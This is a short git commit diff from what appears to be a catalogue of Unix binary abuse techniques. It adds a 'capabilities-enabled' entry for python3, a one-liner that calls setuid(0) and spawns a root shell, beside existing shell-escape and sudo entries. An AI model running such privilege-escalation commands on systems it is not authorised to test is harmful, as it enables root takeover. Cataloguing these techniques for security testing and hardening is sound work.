Add capabilities to perl, php, python3, and ruby

This commit is contained in:
Emilio Pinna
2018-09-12 21:57:04 +01:00
parent e72d7e3d19
commit c7375411b7
4 changed files with 10 additions and 0 deletions

View File

@@ -34,4 +34,6 @@ functions:
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
sudo-enabled:
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
capabilities-enabled:
- code: ./python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
---